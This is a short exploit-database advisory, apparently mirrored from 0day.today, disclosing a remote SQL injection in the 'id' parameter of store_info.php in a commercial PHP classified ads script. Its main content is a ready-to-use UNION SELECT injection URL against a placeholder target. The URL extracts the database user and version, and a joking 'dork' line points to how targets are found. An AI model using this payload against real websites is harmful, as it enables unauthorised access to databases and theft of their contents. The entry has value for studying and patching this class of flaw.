id: 10551
date: 12/31/2009
title: Classified Ads Scrip ( store_info.php id) Remote SQL Injection
author: Hussin X
cves: 

============================================================================
Classified Ads Scrip ( store_info.php id) Remote SQL Injection Vulnerability
============================================================================

|___________________________________________________
|
| script :  http://www.pozscripts.com/product_details.php?item_id=5
|
| DorK   : :)
|___________________________________________________
 
Exploit:
________
 
 
 
www.[target].com/Script/store_info.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(user(),0x3e,version()),18,19,20,21,22,23--
 



#  0day.today [2023-03-21]  #